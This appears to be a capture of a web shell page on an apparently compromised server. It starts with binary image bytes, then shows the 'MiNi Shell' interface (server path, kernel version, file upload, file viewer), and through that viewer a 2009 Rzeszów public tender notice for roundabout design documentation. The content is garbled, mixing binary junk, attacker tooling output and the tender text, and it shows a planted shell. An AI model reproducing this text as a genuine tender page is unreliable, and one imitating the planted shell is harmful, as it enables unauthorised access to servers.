JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091020/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091020/182799-N-2009.html

<p class="kh_header"><b>Rzeszów: Wykonanie dokumentacji projektowej dla zadania inwestycyjnego pn.: Budowa ronda na skrzyżowaniu ulic: Słocińskiej, Rocha, Wieniawskiego i Powstańców Wielkopolskich</b><br>
<b>Numer ogłoszenia: 182799 - 2009; data zamieszczenia: 20.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Rzeszów - Miejski Zarząd Dróg i Zieleni w Rzeszowie , ul. Targowa 1, 35-064 Rzeszów, woj. podkarpackie, tel. 017 8627471 w. 241, faks 017 8526223.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.erzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej dla zadania inwestycyjnego pn.: Budowa ronda na skrzyżowaniu ulic: Słocińskiej, Rocha, Wieniawskiego i Powstańców Wielkopolskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Inwestycja będzie realizowana na podstawie decyzji o zezwoleniu na realizację inwestycji drogowej. Przygotowanie wniosku o uzyskanie takiej decyzji będzie objęte zakresem rzeczowym przedmiotu zamówienia. 

Zakres prac obejmuje : 

1.Mapa do celów projektowych,
2. koncepcje budowy ronda na w/w skrzyżowaniu w min. dwóch różnych wariantach,
3.Dokumentacja geotechniczna +badania nawierzchni metodą ugięć,
4.Warunki techniczne do projektowania budowy, odwodnienia, oświetlenia, przebudowy urządzeń obcych,
5.Mapy do opracowania projektu podziału nieruchomości,
6.Projekt budowlany,
7.Projekty wykonawcze 
1)projekt wykonawczy branży drogowej,
2)projekt wykonawczy budowy odwodnienia,
3)projekt wykonawczy budowy oświetlenia,
4)projekty wykonawcze branżowe w zakresie przebudowy/zabezpieczenia infrastruktury,
8.Projekt wycinki drzew - w przypadku konieczności,
9.Inwentaryzacja i gospodarka istniejącą zielenią (w przypadku konieczności),
10.Projekt stałej organizacji  ruchu,
11.Inne  opracowania wynikające  z  przepisów  szczególnych:
1)dokumentacja przetargowa (wersja elektroniczna i papierowa),
2)przedmiary robót, 
3)kosztorysy inwestorskie z zestawieniem kosztów dla poszczególnych branż, 
4)Szczegółowe Specyfikacje Techniczne,
- Dokumentacja w wersji elektronicznej,
12.Materiały i kompletny wniosek o uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia,
13.Raport oddziaływania inwestycji na środowisko-w przypadku konieczności,
14.Materiały i kompletny wniosek o wydanie pozwolenia wodno-prawnego -w przypadku konieczności,
15.Przygotowanie kompletnego wniosku o uzyskanie zezwolenia na realizację inwestycji drogowej.

Ilości egzemplarzy poszczególnych opracowań zostały podane w załączonej Tabeli Opracowań Projektowych.

Założenia projektowe:
1.średnica zewnętrzna ronda Dz -min. 27 m,
2. obciążenie ruchem dostosować do prognozy natężenia ruchu w 2020 roku,
3. pozostałe dane do projektowania zgodnie z obowiązującymi przepisami.

Opracowanie dokumentacji winno zawierać m.in. :
1)plan sytuacyjny z lokalizacją elementów odwodnienia,
2)plan sytuacyjny z elementami niezbędnymi do geodezyjnego wyznaczenia trasy drogowej,
3)przekroje podłużne i poprzeczne każdego wlotu/wylotu,
4)przekroje podłużne i poprzeczne obwiedni ronda,
5)plan warstwicowy obejmujący swoim zakresem obwiednię ronda oraz wloty na odległość min. 25 m,
6)schemat tyczenia elementów geometrycznych ronda z podaniem współrzędnych X , Y każdego elementu trasy i wysepek.

Wymagania formalno prawne.

1.Projekt budowlany winien spełniać wszelkie wymogi obowiązującej ustawy Prawo budowlane z dn. 7 lipca 1994 r.(Dz. U. nr 89, poz.414) wraz  z późniejszymi zmianami oraz Rozporządzenia MSWiA z dn. 03 listopada 1998 r. w sprawie szczegółowego zakresu i formy projektu budowlanego(Dz. U. 140/98).
Wymagane jest posiadanie przez osoby projektujące i weryfikujące państwowych uprawnień budowlanych stosownej specjalności oraz członkostwo w Polskiej Izbie 
Inżynierów Budownictwa. Projekt budowlany należy uzgodnić branżowo z zainteresowanymi stronami.
2.Dokumentacja projektowa powinna być przygotowana zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004 r. Nr 202 poz.2072),
3. Wniosek o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia należy przygotować zgodnie z Ustawą z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (DZ.U. nr 199 poz. 1227 z dnia 7 listopada 2008 r.),
4.Dokumentacja projektowa powinna uwzględniać wnioski i zalecenia decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji, pozwolenia wodno- prawnego.
5.Wniosek o uzyskanie pozwolenia wodno-prawnego należy przygotować zgodnie z ustawą z dnia 18 lipca 2001 r. Prawo wodne (Dz. U. z 2005 r. nr 239 poz.2019 ze zm.),
6.Wniosek o uzyskanie zezwolenia na realizację inwestycji drogowej należy przygotować zgodnie z ustawą z dnia 25 lipca 2008 r. o zmianie ustawy szczególnych zasadach przygotowywania i realizacji inwestycji w zakresie dróg publicznych oraz  zmianie niektórych ustaw(Dz. U.  Nr 154 z dnia 26.08.2008r. poz. 958).
7.Część przedmiarową i SST należy opracować oddzielnie dla każdej z branż.
8.Wszystkie załączone kserokopie i odpisy: map, uzgodnień itp. winny posiadać  potwierdzenie zgodności z oryginałem.
9.W dokumentacji technicznej należy zaznaczyć w kolorach i opisać:
1)Na planie zagospodarowania terenu(sytuacji)-projektowany oraz istniejący pas drogowy(PPD i IPD), projektowane i istniejące urządzenia obce oraz zakres inwestycji,
2)Na przekrojach poprzecznych -IPD, PPD oraz projektowane i istniejące urządzenia obce.
10. W trakcie projektowania należy uzgodnić(na roboczo) w MZDiZ Rzeszów:
1)koncepcję budowy ronda (koncepcja podlega też uzgodnieniu przez Komisję ds. opiniowania projektów inwestycyjnych przy Prezydencie Miasta Rzeszowa),
2)konstrukcję nawierzchni,
3)projekt organizacji ruchu.
11.Wykonawca zamówienia opracuje i uzyska zatwierdzenie docelowego projektu organizacji ruchu. Projekt podlega zatwierdzeniu  przez  organ zarządzający ruchem drogowym  [Prezydent Miasta] po uprzednim uzyskaniu opinii Komendy Miejskiej Policji i  MZDiZ. Uzyskanie opinii spoczywa na Wykonawcy zamówienia. Projekt organizacji ruchu powinien spełnić wymagania przepisów o ruchu drogowym.
13. Projektant dostarczy Zamawiającemu zarchiwizowaną kopię projektu na nośniku
 magnetycznym, którą można odczytać:
- [pliki graficzne] w *PDF lub AutoCad format .dwg lub .dxf oraz .dwf
- [tekstowe] w Word i Excel
- [kosztorys] w programie Zuzia lub Excel.
14. Jednostka projektowa odpowiada za wady dokumentacji projektowej do czasu odbioru pogwarancyjnego wybudowanego obiektu. Ujawnione w tym okresie wady dokumentacji projektowej Jednostka Projektowa jest zobowiązana poprawić w trybie awaryjnym niezwłocznie po ich ujawnieniu(otrzymanym zawiadomieniu).
15.W związku z prowadzonymi inwestycjami tj. Rozbudowa ul. Powstańców   
Wielkopolskich oraz Przebudowa ul. Wieniawskiego, położonymi w sąsiedztwie  
 przedmiotowego przedsięwzięcia może zachodzić konieczność współpracy z  
 wykonawcami w/w dokumentacji. W przypadku gdy dokumentacje dla powyższy zadań będą już uzgodnione,  może zachodzić konieczność dokonania zmian w  opracowanych projektach w celu właściwego połączenia inwestycji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający niżej podane warunki:
1.Wykonawca składający ofertę nie może być wykluczony z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz spełniać warunki określone w art. 22 ust. 1 ustawy,
2.Doświadczenie zawodowe:
   Wykonawca powinien wykazać, iż w okresie ostatnich trzech lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) od daty wszczęcia postępowania wykonał co najmniej 2 dokumentacje projektowe w zakresie budowy, rozbudowy lub przebudowy dróg lub ulic klasy Z lub wyższej o długości min. 200 m każda - poparte dokumentami potwierdzającymi, że prace te zostały wykonane należycie.
3.Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel bezpośrednio zatrudniony do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów o udostępnieniu osób zdolnych do wykonania zamówienia, tj.:
1. Główny projektant posiadający uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej, który prowadził 2 podobne opracowania
2. Sprawdzający branży drogowej posiadajacy uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej, który prowadził 2 podobne opracowania.
W przypadku konieczności opracowania dokumentacji projektowej na budowę, przebudowę lub zabezpieczenie infrastruktury technicznej Wykonawca zobowiązany jest zapewnić projektantów o odpowiednich uprawnieniach i kwalifikacjach wraz z przedłożeniem ich uprawnień budowlanych i udokumentowaniem przynależności do PIIB.
Za podobne opracowanie Zamawiający uważa:
wykonanie projektu drogi lub ulicy klasy Z  lub wyższej i odcinka większego niż 200 m,

Wszystkie wymienione osoby winny udokumentować członkowstwo w Polskiej Izbie Inżynierów Budownictwa oraz winny załączyć  opis doświadczenia zawodowego.  
4. Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę  min. 50 000,00 zł. 

Ocena spełniania powyższych warunków zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę metodą spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:
1) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 pkt. 1 ustawy Prawo zamówień publicznych na formularzu oświadczenia stanowiącym załącznik nr 2 do Instrukcji dla Wykonawcy,
3) oświadczenie wykonawcy w trybie art. 22 ust. 1 ustawy prawo zamówień publicznych na formularzu stanowiącym załącznik nr 1 do Instrukcji dla wykonawcy.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej:
1. pkt 1) - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
2. Dokument, o którym mowa w pkt 1 powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których powyżej mowa, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty sporządzone w języku obcym powinny być złożone wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę.
4) wykaz wykonanych usług zrealizowanych w okresie ubiegłych trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wykonania (zgodnie z pkt III.2) - na załączniku nr 3 - wraz z dokumentami potwierdzającymi, że prace zostały wykonane należycie,
5) wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności (zgodnie z pkt III.2) na załączniku nr 4 - wraz z uprawnieniami budowlanymi, opisami doświadczenia zawodowego oraz dokumentami potwierdzającymi aktualne członkostwo tych osób w PIIB,
6)pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5, Wykonawca wskazał osoby, którymi będzie dysponował,
7) Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności (zgodnie z pkt III.2).
2. Ponadto do oferty należy dołączyć:
1) pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonania których pełnomocnik jest upoważniony. Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem,
2) pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo do reprezentowania Wykonawców w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - dotyczy tylko Wykonawców wspólnie ubiegających się o uzyskanie zamówienia. Pełnomocnictwo musi być przedstawione w formie oryginału lub kopii poświadczonej notarialnie za zgodność z oryginałem,
3) dane dotyczące zakresu powierzonych podwykonawcom części zamówienia na formularzu oferty.
4) wypełnioną tabelę opracowań projektowych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.erzeszow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg i Zieleni 35-064 Rzeszów ul. Targowa 3 pokój 320 III piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2009 godzina 09:45, miejsce: Miejski Zarząd Dróg i Zieleni 35-064 Rzeszów ul. Targowa 1 pokój 601 VI piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com